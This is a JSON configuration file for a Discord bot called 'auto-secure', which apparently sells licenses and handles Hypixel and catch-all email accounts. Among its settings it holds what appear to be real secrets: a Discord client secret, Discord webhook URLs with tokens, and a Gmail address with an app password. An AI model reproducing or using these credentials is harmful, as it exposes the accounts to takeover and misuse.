{
  "tokens": [""],
  "domains": ["auto-secure.lol"],
  "owners": ["691361579417075846", "381961408327319555", "373598605245677578"],
  "novps": true,
  "useproxy": "false",
  "proxy": [],
  "discordServer": "https://discord.gg/sqTUqr5BEn",
  "authkey": "",
  "transcripts": "",
  "trial": "24h",
  "jwtsecret": "",
  "defaultpfp": "image url",
  "captchakey": "",
  "botslotslink": "",
  "cryptoAddress": "Lh6ZinWUM8bABP9ZPnEZmDQJUxLuT3vVQ9",
  "licensePrice": 8,
  "slotPrice": 12,
  "discordClientId": "1467548705312735374",
  "discordClientSecret": "w8GftwB6MIPKKF-X8aLHklP5YnzHG9_d",
  "notifierWebhook": "https://discord.com/api/webhooks/1467552662756135210/y5UMoNAIYb7C194vQ0GhR0saBOJ727hIekhkyFaIMyo0e36g4iVaVsa-04bTz8H-P4TL",
  "dashboard": {
    "enableWelcome": true,
    "welcomeChannel": "1457875579734069443",
    "welcomeMessage": "Bienvenido a {server}, disfruta tu estadía!",
    "enableLogs": true,
    "logsChannel": "1459083308574052404",
    "enableStats": true,
    "statsChannel": "1459089185104465921",
    "ticketCategory": "1459076810980589685",
    "adminRoles": ["691361579417075846"],
    "moderatorRoles": [],
    "buyChannels": [1459041695026118781],
    "allowRolePurchase": false,
    "embedFooter": {
      "text": "",
      "icon_url": null
    },
    "notifierWebhook": "https://discord.com/api/webhooks/1465851250301206651/ITSwdSFt_K_8JTRn1S4uYGJDSJVTQheJBJL3-_Z_CFUHw1GSn8GzfLsbxgjwQ5rfaLn5"
  },
  "guildid": "1457875579268497612",
  "welcomechannel": "1457875579734069443",
  "leaderboard": "",
  "log": "1459083308574052404",
  "statsChannel": "1459089185104465921",
  "buyChannels": [1459041695026118781],
  "footer1": "",
  "email": {
    "host": "imap.gmail.com",
    "port": 993,
    "user": "autosecure231@gmail.com",
    "password": "tptk ftbt qnzw nnqc",
    "checkInterval": 30,
    "domain": "inbox.auto-secure.lol",
    "useCatchAll": true
  },
  "shoplink": "",
  "roleid": "1457876121528963204",
  "memberrole": "1468041985049886750",
  "ip6": "",
  "ip4": "",
  "hypixelemail": "",
  "hypixelpassword": "",
  "ticketcategory": "1459076810980589685",
  "vpsip": "",
  "vpsip2": "",
  "footer": {
    "text": "",
    "icon_url": null
  },
  "blockedEmails": [],
  "ignoreEmails": []
}
